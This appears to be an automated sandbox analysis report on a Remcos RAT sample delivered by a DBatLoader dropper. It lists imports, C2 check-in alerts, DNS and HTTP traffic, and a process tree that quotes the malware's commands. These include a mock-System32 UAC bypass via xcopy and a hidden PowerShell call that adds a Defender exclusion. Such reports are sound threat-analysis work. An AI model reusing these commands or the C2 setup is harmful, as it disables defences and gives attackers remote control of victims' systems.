gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                                                                                                ole32.dllCoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                kernel32.dllSleep
                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                                                                                                comdlg32.dllPrintDlgA
                                                                                                *invalid*NtWriteVirtualMemory
                                                                                                Kernel32GetProcAddress
                                                                                                ntdllNtProtectVirtualMemory
                                                                                                uRLAutodialHookCallback
                                                                                                ntdllNtQueryInformationFile, NtOpenFile, NtClose, NtReadFile
                                                                                                ntdllRtlDosPathNameToNtPathName_U
Language of compilation system: English
Country where language is spoken: United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/04/23-18:16:13.628852 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 2404 | 49682 | 23.172.112.72 | 192.168.2.4
08/04/23-18:14:07.921866 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49682 | 2404 | 192.168.2.4 | 23.172.112.72
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 4, 2023 18:13:57.788178921 CEST | 192.168.2.4 | 8.8.8.8 | 0x63b8 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:13:58.548813105 CEST | 192.168.2.4 | 8.8.8.8 | 0x33a7 | Standard query (0) | ayhtnw.dm.files.1drv.com | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:14:07.613934040 CEST | 192.168.2.4 | 8.8.8.8 | 0x6b7d | Standard query (0) | www.binccoco.com | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:14:08.594635963 CEST | 192.168.2.4 | 8.8.8.8 | 0x8b46 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:14:14.103719950 CEST | 192.168.2.4 | 8.8.8.8 | 0x4de5 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:14:14.756884098 CEST | 192.168.2.4 | 8.8.8.8 | 0x257e | Standard query (0) | ayhtnw.dm.files.1drv.com | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:14:20.915117025 CEST | 192.168.2.4 | 8.8.8.8 | 0x3019 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:14:21.614938021 CEST | 192.168.2.4 | 8.8.8.8 | 0x87fa | Standard query (0) | ayhtnw.dm.files.1drv.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 4, 2023 18:13:57.841723919 CEST | 8.8.8.8 | 192.168.2.4 | 0x63b8 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:13:57.841723919 CEST | 8.8.8.8 | 192.168.2.4 | 0x63b8 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:13:58.615603924 CEST | 8.8.8.8 | 192.168.2.4 | 0x33a7 | No error (0) | ayhtnw.dm.files.1drv.com | dm-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:13:58.615603924 CEST | 8.8.8.8 | 192.168.2.4 | 0x33a7 | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:14:07.801903963 CEST | 8.8.8.8 | 192.168.2.4 | 0x6b7d | No error (0) | www.binccoco.com | | 23.172.112.72 | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:14:08.617824078 CEST | 8.8.8.8 | 192.168.2.4 | 0x8b46 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Aug 4, 2023 18:14:14.132591009 CEST | 8.8.8.8 | 192.168.2.4 | 0x4de5 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:14:14.132591009 CEST | 8.8.8.8 | 192.168.2.4 | 0x4de5 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:14:14.805712938 CEST | 8.8.8.8 | 192.168.2.4 | 0x257e | No error (0) | ayhtnw.dm.files.1drv.com | dm-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:14:14.805712938 CEST | 8.8.8.8 | 192.168.2.4 | 0x257e | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:14:20.978816986 CEST | 8.8.8.8 | 192.168.2.4 | 0x3019 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:14:20.978816986 CEST | 8.8.8.8 | 192.168.2.4 | 0x3019 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:14:21.634728909 CEST | 8.8.8.8 | 192.168.2.4 | 0x87fa | No error (0) | ayhtnw.dm.files.1drv.com | dm-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2023 18:14:21.634728909 CEST | 8.8.8.8 | 192.168.2.4 | 0x87fa | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false

• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49683 | 178.237.33.50 | 80 | C:\Users\Public\Libraries\flhgywjG.bat

Timestamp:Aug 4, 2023 18:14:08.657044888 CEST
kBytes transferred:998
Direction:OUT
Data:
GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Timestamp:Aug 4, 2023 18:14:08.687000036 CEST
kBytes transferred:999
Direction:IN
Data:
HTTP/1.1 200 OK
date: Fri, 04 Aug 2023 16:14:08 GMT
server: Apache/2.4.52 (Ubuntu)
content-length: 944
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                                                                Data Ascii: { "geoplugin_request":"102.129.143.30", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.8744}



                                                                                                Target ID:0
                                                                                                Start time:18:13:56
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                Imagebase:0x400000
                                                                                                File size:1'113'600 bytes
                                                                                                MD5 hash:AE5AD2EFD8A9CF25AD9EB00EBE24EB92
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low

                                                                                                Target ID:2
                                                                                                Start time:18:14:01
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" "
                                                                                                Imagebase:0xd90000
                                                                                                File size:232'960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:3
                                                                                                Start time:18:14:01
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c72c0000
                                                                                                File size:625'664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:4
                                                                                                Start time:18:14:02
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                                                                                                Imagebase:0xd90000
                                                                                                File size:232'960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:5
                                                                                                Start time:18:14:02
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                                                                                                Imagebase:0x13a0000
                                                                                                File size:44'544 bytes
                                                                                                MD5 hash:9F3712DDC0D7FE3D75B8A06C6EE8E68C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                Target ID:6
                                                                                                Start time:18:14:02
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                                                                                                Imagebase:0xd90000
                                                                                                File size:232'960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:8
                                                                                                Start time:18:14:02
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                                                                                                Imagebase:0x13a0000
                                                                                                File size:44'544 bytes
                                                                                                MD5 hash:9F3712DDC0D7FE3D75B8A06C6EE8E68C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                Target ID:9
                                                                                                Start time:18:14:03
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                                                                                                Imagebase:0xd90000
                                                                                                File size:232'960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:10
                                                                                                Start time:18:14:03
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
                                                                                                Imagebase:0x13a0000
                                                                                                File size:44'544 bytes
                                                                                                MD5 hash:9F3712DDC0D7FE3D75B8A06C6EE8E68C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:11
                                                                                                Start time:18:14:03
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows \System32\easinvoker.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows \System32\easinvoker.exe
                                                                                                Imagebase:0x7ff780540000
                                                                                                File size:131'648 bytes
                                                                                                MD5 hash:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs

                                                                                                Target ID:12
                                                                                                Start time:18:14:03
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                                                                                                Imagebase:0x7ff632260000
                                                                                                File size:273'920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:13
                                                                                                Start time:18:14:03
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c72c0000
                                                                                                File size:625'664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:14
                                                                                                Start time:18:14:04
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                Imagebase:0x7ff722d20000
                                                                                                File size:447'488 bytes
                                                                                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                Target ID:15
                                                                                                Start time:18:14:04
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:ping 127.0.0.1 -n 6
                                                                                                Imagebase:0xc00000
                                                                                                File size:18'944 bytes
                                                                                                MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:16
                                                                                                Start time:18:14:04
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c72c0000
                                                                                                File size:625'664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:17
                                                                                                Start time:18:14:06
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Users\Public\Libraries\flhgywjG.bat
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\Public\Libraries\flhgywjG.bat
                                                                                                Imagebase:0x400000
                                                                                                File size:175'800 bytes
                                                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                Antivirus matches:
                                                                                                • Detection: 4%, ReversingLabs

                                                                                                Target ID:19
                                                                                                Start time:18:14:10
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Users\Public\Libraries\Gjwyghlf.PIF
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\Public\Libraries\Gjwyghlf.PIF"
                                                                                                Imagebase:0x400000
                                                                                                File size:1'113'600 bytes
                                                                                                MD5 hash:AE5AD2EFD8A9CF25AD9EB00EBE24EB92
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Gjwyghlf.PIF, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 55%, ReversingLabs

                                                                                                Target ID:20
                                                                                                Start time:18:14:15
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Users\Public\Libraries\flhgywjG.bat
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\Public\Libraries\flhgywjG.bat
                                                                                                Imagebase:0x400000
                                                                                                File size:175'800 bytes
                                                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                Target ID:21
                                                                                                Start time:18:14:19
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Users\Public\Libraries\Gjwyghlf.PIF
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\Public\Libraries\Gjwyghlf.PIF"
                                                                                                Imagebase:0x400000
                                                                                                File size:1'113'600 bytes
                                                                                                MD5 hash:AE5AD2EFD8A9CF25AD9EB00EBE24EB92
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi

                                                                                                Target ID:22
                                                                                                Start time:18:14:22
                                                                                                Start date:04/08/2023
                                                                                                Path:C:\Users\Public\Libraries\flhgywjG.bat
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\Public\Libraries\flhgywjG.bat
                                                                                                Imagebase:0x400000
                                                                                                File size:175'800 bytes
                                                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:12.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:3.4%
                                                                                                  Total number of Nodes:2000
                                                                                                  Total number of Limit Nodes:26
23141->23144 23145 2867b80 19 API calls 23142->23145 23148 2867b80 19 API calls 23143->23148 23146 286f507 23144->23146 23147 286f61b 23145->23147 23149 2854824 11 API calls 23146->23149 23150 2854824 11 API calls 23147->23150 23151 286e763 23148->23151 23154 286f527 23149->23154 23155 286f63b 23150->23155 23152 286e89a 23151->23152 23153 286e788 23151->23153 23156 2854824 11 API calls 23152->23156 23157 2854824 11 API calls 23153->23157 23159 28547b0 11 API calls 23154->23159 23160 28547b0 11 API calls 23155->23160 23158 286e8ba 23156->23158 23162 286e7a8 23157->23162 23161 286e8c5 23158->23161 23164 286f55c 23159->23164 23165 286f670 23160->23165 23166 28547b0 11 API calls 23161->23166 23163 286e7c0 23162->23163 23167 28547b0 11 API calls 23163->23167 23169 2867b80 19 API calls 23164->23169 23170 2867b80 19 API calls 23165->23170 23168 286e8ef 23166->23168 23173 286e7dd 23167->23173 23171 286e8fa 23168->23171 23179 286f580 23169->23179 23172 286f694 23170->23172 23177 2867b80 19 API calls 23171->23177 24166 28549c4 23172->24166 23174 286e7f5 23173->23174 23178 2867b80 19 API calls 23174->23178 23181 286e913 23177->23181 23182 286e801 23178->23182 24601 285802c CreateDirectoryA 23179->24601 23180 2854824 11 API calls 23187 286f6e7 23180->23187 23183 2854824 11 API calls 23181->23183 23184 2854824 11 API calls 23182->23184 23189 286e933 23183->23189 23186 286e821 23184->23186 23188 286e82c 23186->23188 23190 28547b0 11 API calls 23187->23190 23192 28547b0 11 API calls 23188->23192 23191 28547b0 11 API calls 23189->23191 23194 286f71c 23190->23194 23196 286e968 23191->23196 23193 286e856 23192->23193 23195 286e861 23193->23195 23197 2867b80 19 API calls 23194->23197 23199 2867b80 19 API calls 23195->23199 23198 2867b80 19 API calls 23196->23198 23200 286f740 23197->23200 23201 286e98c CoUninitialize 23198->23201 23202 286e87a 23199->23202 23203 2854824 11 API calls 23200->23203 23201->22757 24600 286c8d8 11 API calls 23202->24600 23207 286f760 23203->23207 23205 
